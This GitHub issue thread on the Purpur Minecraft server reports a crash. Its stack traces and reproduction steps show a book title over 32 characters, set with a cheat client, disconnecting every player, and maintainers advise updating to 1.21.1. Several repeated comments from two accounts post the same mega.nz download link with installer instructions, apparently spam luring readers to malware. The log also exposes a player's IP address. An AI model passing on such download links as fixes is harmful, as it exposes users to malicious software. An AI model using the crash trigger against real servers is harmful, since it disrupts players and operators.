### ISSUE TITLE
Crash: Error sending packet clientbound/minecraft:container_set_slot (skippable? false)

### ISSUE THREAD

**Issue by GG-MD** [pl3xgaming/Purpur#1583]
### Spark link

--

### Stack trace

```
[02:39:14] [Server thread/INFO]: CreamPie lost connection: Disconnected
[02:39:17] [User Authenticator #232/INFO]: UUID of player CreamPie is b1a3af5d-789a-3ec1-ad91-3b9823ca79b4
[02:39:17] [Server thread/INFO]: CreamPie[/95.26.165.121:44347] logged in with entity id 641673 at ([world]15039.699999988079, 69.0, -15665.300000011921)
[02:39:26] [Netty Epoll Server IO #1/ERROR]: Error sending packet clientbound/minecraft:container_set_slot (skippable? false)
io.netty.handler.codec.EncoderException: Failed to encode packet 'clientbound/minecraft:container_set_slot'
	at net.minecraft.network.codec.IdDispatchCodec.encode(IdDispatchCodec.java:53) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.IdDispatchCodec.encode(IdDispatchCodec.java:20) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.PacketEncoder.encode(PacketEncoder.java:26) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.PacketEncoder.encode(PacketEncoder.java:12) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at io.netty.handler.codec.MessageToByteEncoder.write(MessageToByteEncoder.java:107) ~[netty-codec-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite0(AbstractChannelHandlerContext.java:881) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite(AbstractChannelHandlerContext.java:863) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:968) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:856) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.handler.codec.MessageToMessageEncoder.write(MessageToMessageEncoder.java:113) ~[netty-codec-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite0(AbstractChannelHandlerContext.java:881) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite(AbstractChannelHandlerContext.java:863) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:968) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:856) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.handler.codec.MessageToByteEncoder.write(MessageToByteEncoder.java:120) ~[netty-codec-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite0(AbstractChannelHandlerContext.java:881) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite(AbstractChannelHandlerContext.java:863) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:968) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:856) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.ChannelOutboundHandlerAdapter.write(ChannelOutboundHandlerAdapter.java:113) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at net.minecraft.network.Connection$2.write(Connection.java:771) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite0(AbstractChannelHandlerContext.java:881) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite(AbstractChannelHandlerContext.java:863) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:968) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:856) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.ChannelDuplexHandler.write(ChannelDuplexHandler.java:115) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at Vulcan-2.9.0.jar/io.github.repooper.packetevents.injector.modern.PlayerChannelHandlerModern.write(PlayerChannelHandlerModern.java:61) ~[Vulcan-2.9.0.jar:?]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite0(AbstractChannelHandlerContext.java:879) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite(AbstractChannelHandlerContext.java:863) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:968) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:856) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.ChannelDuplexHandler.write(ChannelDuplexHandler.java:115) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at TAB.v4.1.6.jar/me.neznamy.tab.shared.features.injection.NettyPipelineInjector$TabChannelDuplexHandler.write(NettyPipelineInjector.java:115) ~[TAB.v4.1.6.jar:?]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite0(AbstractChannelHandlerContext.java:879) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite(AbstractChannelHandlerContext.java:863) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:968) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:856) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.ChannelDuplexHandler.write(ChannelDuplexHandler.java:115) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at TradeSystem_v2.6.0_Hotfix-1.jar/de.codingair.tradesystem.lib.codingapi.player.data.PacketReader$1.write(PacketReader.java:85) ~[TradeSystem_v2.6.0_Hotfix-1.jar:?]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite0(AbstractChannelHandlerContext.java:879) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite(AbstractChannelHandlerContext.java:863) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:968) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:856) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.ChannelDuplexHandler.write(ChannelDuplexHandler.java:115) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at TradeSystem_v2.6.0_Hotfix-1.jar/de.codingair.tradesystem.lib.codingapi.player.data.PacketReader$1.write(PacketReader.java:85) ~[TradeSystem_v2.6.0_Hotfix-1.jar:?]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite0(AbstractChannelHandlerContext.java:879) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite(AbstractChannelHandlerContext.java:863) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:968) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:856) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.ChannelDuplexHandler.write(ChannelDuplexHandler.java:115) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at PetNameFix-1.0.2.jar/io.github.tanguygab.petnamefix.PipelineInjector$BukkitChannelDuplexHandler.write(PipelineInjector.java:89) ~[PetNameFix-1.0.2.jar:?]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite0(AbstractChannelHandlerContext.java:879) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.invokeWrite(AbstractChannelHandlerContext.java:863) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:968) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannelHandlerContext.write(AbstractChannelHandlerContext.java:856) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.DefaultChannelPipeline.write(DefaultChannelPipeline.java:1015) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.AbstractChannel.write(AbstractChannel.java:301) ~[netty-transport-4.1.97.Final.jar:4.1.97.Final]
	at ProtocolLib.jar/com.comphenix.protocol.injector.netty.channel.NettyChannelProxy.write(NettyChannelProxy.java:210) ~[ProtocolLib.jar:?]
	at ProtocolLib.jar/com.comphenix.protocol.injector.netty.channel.NettyChannelProxy.write(NettyChannelProxy.java:199) ~[ProtocolLib.jar:?]
	at net.minecraft.network.Connection.doSendPacket(Connection.java:513) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.Connection.lambda$sendPacket$13(Connection.java:498) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at ProtocolLib.jar/com.comphenix.protocol.injector.netty.channel.NettyEventLoopProxy.lambda$proxyRunnable$2(NettyEventLoopProxy.java:49) ~[ProtocolLib.jar:?]
	at io.netty.util.concurrent.AbstractEventExecutor.runTask(AbstractEventExecutor.java:174) ~[netty-common-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.util.concurrent.AbstractEventExecutor.safeExecute(AbstractEventExecutor.java:167) ~[netty-common-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.util.concurrent.SingleThreadEventExecutor.runAllTasks(SingleThreadEventExecutor.java:470) ~[netty-common-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.channel.epoll.EpollEventLoop.run(EpollEventLoop.java:413) ~[netty-transport-classes-epoll-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997) ~[netty-common-4.1.97.Final.jar:4.1.97.Final]
	at io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74) ~[netty-common-4.1.97.Final.jar:4.1.97.Final]
	at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]
Caused by: java.lang.RuntimeException: Error encoding component minecraft:written_book_content
	at net.minecraft.core.component.DataComponentPatch$1.encodeComponent(DataComponentPatch.java:151) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.core.component.DataComponentPatch$1.encode(DataComponentPatch.java:128) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.core.component.DataComponentPatch$1.encode(DataComponentPatch.java:66) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.item.ItemStack$1.encode(ItemStack.java:190) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.item.ItemStack$1.encode(ItemStack.java:154) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.protocol.game.ClientboundContainerSetSlotPacket.write(ClientboundContainerSetSlotPacket.java:38) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.StreamCodec$2.encode(StreamCodec.java:38) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.StreamCodec$5.encode(StreamCodec.java:88) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.StreamCodec$5.encode(StreamCodec.java:78) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	... 69 more
Caused by: io.netty.handler.codec.EncoderException: String too big (was 44 characters, max 32)
	at net.minecraft.network.Utf8String.write(Utf8String.java:35) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.ByteBufCodecs$12.encode(ByteBufCodecs.java:271) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.ByteBufCodecs$12.encode(ByteBufCodecs.java:263) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.StreamCodec$8.encode(StreamCodec.java:140) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.StreamCodec$11.encode(StreamCodec.java:230) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.core.component.DataComponentPatch$1.encodeComponent(DataComponentPatch.java:149) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.core.component.DataComponentPatch$1.encode(DataComponentPatch.java:128) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.core.component.DataComponentPatch$1.encode(DataComponentPatch.java:66) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.item.ItemStack$1.encode(ItemStack.java:190) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.item.ItemStack$1.encode(ItemStack.java:154) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.protocol.game.ClientboundContainerSetSlotPacket.write(ClientboundContainerSetSlotPacket.java:38) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.StreamCodec$2.encode(StreamCodec.java:38) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.StreamCodec$5.encode(StreamCodec.java:88) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.codec.StreamCodec$5.encode(StreamCodec.java:78) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	... 69 more
[02:39:26] [Server thread/INFO]: CreamPie lost connection: Internal Exception: io.netty.handler.codec.EncoderException: Failed to encode packet 'clientbound/minecraft:container_set_slot'
[02:39:26] [Server thread/WARN]: Failed to save player data for CreamPie
net.minecraft.ReportedException: Saving entity NBT
	at net.minecraft.world.entity.Entity.saveWithoutId(Entity.java:2594) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.entity.Entity.saveWithoutId(Entity.java:2428) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.level.storage.PlayerDataStorage.save(PlayerDataStorage.java:40) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.players.PlayerList.save(PlayerList.java:574) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.players.PlayerList.remove(PlayerList.java:631) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.players.PlayerList.remove(PlayerList.java:591) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.network.ServerGamePacketListenerImpl.removePlayerFromWorld(ServerGamePacketListenerImpl.java:2115) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.network.ServerGamePacketListenerImpl.onDisconnect(ServerGamePacketListenerImpl.java:2095) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.network.ServerGamePacketListenerImpl.onDisconnect(ServerGamePacketListenerImpl.java:2082) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.network.Connection.handleDisconnection(Connection.java:911) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.network.ServerConnectionListener.tick(ServerConnectionListener.java:262) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.MinecraftServer.tickChildren(MinecraftServer.java:1860) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.dedicated.DedicatedServer.tickChildren(DedicatedServer.java:509) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.MinecraftServer.tickServer(MinecraftServer.java:1634) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1334) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:333) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]
Caused by: java.lang.IllegalStateException: String "HELHELHEPHEJHEKHJEKHJEKHEJHKEJHEKHJEKHJEKHJE" is too long: 44, expected range [0-32]
	at com.mojang.serialization.DataResult$Error.getOrThrow(DataResult.java:287) ~[datafixerupper-8.0.16.jar:?]
	at com.mojang.serialization.DataResult.getOrThrow(DataResult.java:81) ~[datafixerupper-8.0.16.jar:?]
	at net.minecraft.world.item.ItemStack.save(ItemStack.java:616) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.entity.player.Inventory.save(Inventory.java:501) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.entity.player.Player.addAdditionalSaveData(Player.java:970) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.server.level.ServerPlayer.addAdditionalSaveData(ServerPlayer.java:613) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.entity.Entity.addAdditionalSaveData(Entity.java:2764) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	at net.minecraft.world.entity.Entity.saveWithoutId(Entity.java:2537) ~[purpur-1.21.jar:1.21-2284-4e55e26]
	... 16 more
```

### Actions to reproduce (if known)

Create a “book and pen.”
Using the cheat client, set the title of the book, over 32 characters.
Throws out all players with an error: “Internal Exception: io.netty.handler.codec.EncoderException: Failed to encode packet 'clientbound/minecraft:set_equipment'”

### Purpur version

Current Purpur Version: 1.21-2284-4e55e26 (MC: 1.21)*
* You are running the latest version

### Agreements

- [X] I am running the latest version of Purpur available from https://purpurmc.org/downloads.
- [X] I have searched for and ensured there isn't already an open issue regarding this.
- [ ] I ticked all the boxes without actually reading them
- [X] My version of Minecraft is supported by Purpur.

### Other

This probably works on 1.21.1 as well.

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by granny** [comment]
1.21 is outdated. Please use the latest version of Purpur.

**Comment by Krakenied** [comment]
(and don't ignore the update as the thrown exception is probably related to dupe exploit present on this version)

**Comment by GG-MD** [comment]
> (and don't ignore the update as the thrown exception is probably related to dupe exploit present on this version)

Please advise, I have done a lot to upgrade to 1.21, as you know a lot of changes have been made.
Is it easy to upgrade to 1.21.1, or is it roughly the same, only with fixes?

**Comment by granny** [comment]
1.21.1 is solely a hotfix version, so there should be no issues updating. You will only run into issues with plugins where the developer purposefully hardcodes the minecraft version.

**Comment by GG-MD** [comment]
> 1.21.1 is solely a hotfix version, so there should be no issues updating. You will only run into issues with plugins where the developer purposefully hardcodes the minecraft version.

Thx u.
Can I be sure that my report above is fixed in PurPur 1.21.1 latest?

**Comment by GG-MD** [comment]
> > 1.21.1 is solely a hotfix version, so there should be no issues updating. You will only run into issues with plugins where the developer purposefully hardcodes the minecraft version.
> 
> Thx u. Can I be sure that my report above is fixed in PurPur 1.21.1 latest?

Hey?

**Comment by granny** [comment]
> > 1.21.1 is solely a hotfix version, so there should be no issues updating. You will only run into issues with plugins where the developer purposefully hardcodes the minecraft version.
> 
> Thx u. Can I be sure that my report above is fixed in PurPur 1.21.1 latest?

Yes. I wouldn't be telling you to update if it weren't the case.
